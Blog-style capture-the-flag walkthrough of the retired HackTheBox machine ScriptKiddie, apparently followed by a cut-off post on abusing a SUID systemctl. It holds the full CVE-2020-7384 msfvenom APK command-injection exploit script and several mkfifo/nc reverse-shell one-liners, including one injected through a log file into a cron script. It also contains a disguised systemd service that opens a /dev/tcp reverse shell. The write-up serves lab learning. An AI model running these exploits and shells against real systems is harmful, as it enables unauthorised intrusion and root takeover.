HacktheBox -ScriptKiddie

HacktheBox -ScriptKiddie - Retired

Recon

As is normal I started off with a threader3000 scan of the IP address.

We show 2 ports open 22 and 5000

Using threader to launch nmap on just those ports comes back with these results.

Nmap scan report for 10.10.10.226
Host is up (0.060s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
| 256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
|_ 256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-title: k1d'5 h4ck3r t00l5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.09 seconds
------------------------------------------------------------
Combined scan completed in 0:01:43.278542

Let's check out port 5000

Looks like a page that can query searchsploit, run nmap scans and generate msfvenom payloads.

I tried playing with the nmap & seachsploit functions to see if I could insert some other code to run commands on the box without success. So let's pivot to the payloads function.

I've never used a template to make a msfvenom payload before so that is intriguing.

Just a quick google search for msvenom template, and we see this interesting result.

https://www.exploit-db.com/exploits/49491

Here is a good writeup about the nuts and bolts of this RCE.

https://github.com/justinsteven/advisories/blob/master/2020_metasploit_msfvenom_apk_template_cmdi.md

Looks like this is a python script for inserting a payload inside of a template file.

# Exploit Title: Metasploit Framework 6.0.11 - msfvenom APK template command injection
# Exploit Author: Justin Steven
# Vendor Homepage: https://www.metasploit.com/
# Software Link: https://www.metasploit.com/
# Version: Metasploit Framework 6.0.11 and Metasploit Pro 4.18.0
# CVE : CVE-2020-7384

#!/usr/bin/env python3
import subprocess
import tempfile
import os
from base64 import b64encode

# Change me
payload = 'echo "Code execution as $(id)" > /tmp/win'

# b64encode to avoid badchars (keytool is picky)
payload_b64 = b64encode(payload.encode()).decode()
dname = f"CN='|echo {payload_b64} | base64 -d | sh #"

print(f"[+] Manufacturing evil apkfile")
print(f"Payload: {payload}")
print(f"-dname: {dname}")
print()

tmpdir = tempfile.mkdtemp()
apk_file = os.path.join(tmpdir, "evil.apk")
empty_file = os.path.join(tmpdir, "empty")
keystore_file = os.path.join(tmpdir, "signing.keystore")
storepass = keypass = "password"
key_alias = "signing.key"

# Touch empty_file
open(empty_file, "w").close()

# Create apk_file
subprocess.check_call(["zip", "-j", apk_file, empty_file])

# Generate signing key with malicious -dname
subprocess.check_call(["keytool", "-genkey", "-keystore", keystore_file, "-alias", key_alias, "-storepass", storepass,
"-keypass", keypass, "-keyalg", "RSA", "-keysize", "2048", "-dname", dname])

# Sign APK using our malicious dname
subprocess.check_call(["jarsigner", "-sigalg", "SHA1withRSA", "-digestalg", "SHA1", "-keystore", keystore_file,
"-storepass", storepass, "-keypass", keypass, apk_file, key_alias])

print()
print(f"[+] Done! apkfile is at {apk_file}")
print(f"Do: msfvenom -x {apk_file} -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o /dev/null")

Let's see if we can get this to work.

Exploit

First for just POC, I'm going to try and have the box ping my VPN ip of 10.10.14.2

An error about no jarsigner… because kali doesn't ship with the jdk… let's install that

sudo apt install -y default-jdk

You might also notice ( my VPN ip address changed after this) so I modfied the script again.

Then generate the apk payload

Now we need to change the options for msfvenom on the website to Andriod so we can upload this apk.. And we can put anything we want for the IP address.

Then browse to the apk…. But before we do this let's set up a tcpdump listener to see if we do get pings back.

sudo tcpdump -i tun0 -n icmp

So listen to TCP traffic on on VPN (tun0) interface and only tell us about ICMP

Now if we click generate.

We get pings back, so we have POC (Proof of concept) working for this exploit.

Now let's modify it to get back a shell instead.

This step took me a couple minutes, I couldn't get the standard NC or mkfifo shell to work…

So I made an APK to grab the passwd file.

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
kid:x:1000:1000:kid:/home/kid:/bin/bash
pwn:x:1001:1001::/home/pwn:/bin/bash

I noticed the users were setup to use /bin/bash and not /bin/sh ( which is what I was trying with my reverse shells)

I modified the last one I was working with mkfifo

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.14 5555 >/tmp/f

Made the apk, uploaded it and…….

We got our foothold shell!!

For grins and giggles I looked at the kids python for the site.

And there is a regex filter for only allowing ip address in the nmap function.

And a regex filter to only allow alpha numeric in the searchsploit function.

regex_ip = re.compile(r'^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$')
regex_alphanum = re.compile(r'^[A-Za-z0-9 \.]+$')

That little scamp.

He is also writing out failed attempts to a log file on just the searchsploit function.

def searchsploit(text, srcip):
if regex_alphanum.match(text):
result = subprocess.check_output(['searchsploit', '--color', text])
return render_template('index.html', searchsploit=result.decode('UTF-8', 'ignore'))
else:
with open('/home/kid/logs/hackers', 'a') as f:
f.write(f'[{datetime.datetime.now()}] {srcip}\n')
return render_template('index.html', sserror="stop hacking me - well hack you back")

But that log file is empty

Poking around /home there is another user named pwn that we have some access to

There is a file name scanlosers.sh

cat ./scanlosers.sh
#!/bin/bash

log=/home/kid/logs/hackers

cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done

if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi

Looks like he is reading from that log and runs an nmap scan against the people who made their way into the logs :)

It's a weird setup though…. A script running from /home/pwn that is calling a log file in /home/kid

I wonder if there is a cron job that runs that script to "AutoPWN" the "hackers"

What happens if you put something in that empty file? Let's start again with a POC of a ping to see if we can get it working.

We need to be careful here, to inject where we want to inject the we need to pay close attention to this part in the scanlosers.sh file

cut -d' ' -f3-

We want our injection to be the third field delimited by spaces.

Let's make a file called POC to play with to make sure we get this right

echo 1 2 EVILCODE > POC

Let's run the exact cut command on our file to see if it grabs the EVILCODE part

cat POC | cut -d' ' -f3-

Great so we know we need to put our command behind a couple of values separated by spaces.

So something like this

echo "1 2 ;/bin/bash -c 'ping -c 4 10.10.14.14'" >> /home/kid/logs/hackers

Let's run tcpdump again to make sure we can see the pings coming in.

And we can see we did get our pings back.

Now we should be able to just modify our POC with a reverse shell

Let's start a nc listener on port 4444

nc -lnvp 4444

Since the mkfifo Reverse shell worked on the initial connection for us let's use it again and just change the port number

echo "1 2 ;/bin/bash -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.14 4444 >/tmp/f'" >> /home/kid/logs/hackers

and

We caught a shell

But it's a broken shell and doesn't do anything. I wonder if it has something to do with the field not being delimited with a space at the end? Let's just try adding a couple spaces to the end of our command before we write it to a file.

echo "1 2 ;/bin/bash -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.14 4444 >/tmp/f' " >> /home/kid/logs/hackers

Same thing maybe there needs to be another character there to denote another field?

echo "1 2 ;/bin/bash -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.14 4444 >/tmp/f' circusmonkey" >> /home/kid/logs/hackers

This finally got back a good working shell!

One of the first things to check when doing priv escelcation and landing as a new user is their sudo permissions

sudo -l

Pwn can run msfconsole as root with no root password needed.

I don't know if you know this… but I'm going to drop a little knowledge here… you can run any linux command from the msfconsole as the user. Id ,ifconfig, chmod… literally anything you want to.

We can simply cat out our flag from here

cat /root/root.txt

But just reading a flag isn't good enough… We want to completely own this box.

It's pretty trivial at this point we can use mkfifo again from the msfconsole to land another reverse shell with nc

Start another listener

nc -lnvp 5566

Then drop a new mkfifo in the msfconsole

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.14 5566 >/tmp/f

And we are in as root with full access…

Abusing systemctl SUID for reverse shell

Today I came across a box that had the SUID set for systemctl connected as the apache user www-data I was able to get a root reverse shell. This is to document how to use this for privilege escalation. I used a bit from this blog https://carvesystems.com/news/contest-exploiting-misconfigured-sudo/ and a bit from here too https://hosakacorp.net/p/systemd-user.html Step1. Create a fake service I named my LegitService.service I placed it in the /tmp directory on the server. [Unit] UNIT=LegitService Description=Black magic happening, avert your eyes [Service] RemainAfterExit=yes Type=simple ExecStart=/bin/bash -c "exec 5<>/dev/tcp/10.2.21.243/5555; cat <&5 | while read line; do $line 2>&5 >&5; done" [Install] WantedBy=default.target Then in order to add this to a place we can use systemctl to call from I created a link from /tmp, since I didn't have permission to put the file in the normal systemd folders systemctl link /tmp/LegitService.service The

circusmonkey404's Security Site

Search This Blog